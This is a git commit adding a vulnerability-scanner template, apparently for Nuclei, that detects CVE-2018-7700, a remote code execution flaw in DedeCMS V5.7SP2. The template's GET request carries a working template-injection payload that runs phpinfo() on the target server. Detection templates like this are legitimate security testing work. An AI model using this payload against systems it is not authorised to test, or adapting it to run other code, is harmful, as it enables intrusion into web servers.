Merge pull request #1084 from pikpikcu/patch-124

Create CVE-2018-7700.yaml
2021-03-15 14:30:10 +05:30 · 2021-03-15 14:30:10 +05:30 · f0a36c81e1
parent b09026a396 70ea0f089b
commit f0a36c81e1
1 changed files with 27 additions and 0 deletions
--- a/cves/2018/CVE-2018-7700.yaml
+++ b/cves/2018/CVE-2018-7700.yaml
@ -0,0 +1,27 @@
+id: CVE-2018-7700
+
+info:
+  name: DedeCMS V5.7SP2 RCE
+  author: pikpikcu
+  severity: high
+  reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/
+  tags: cve,cve2018,dedecms,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "phpinfo"
+          - "PHP Version"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200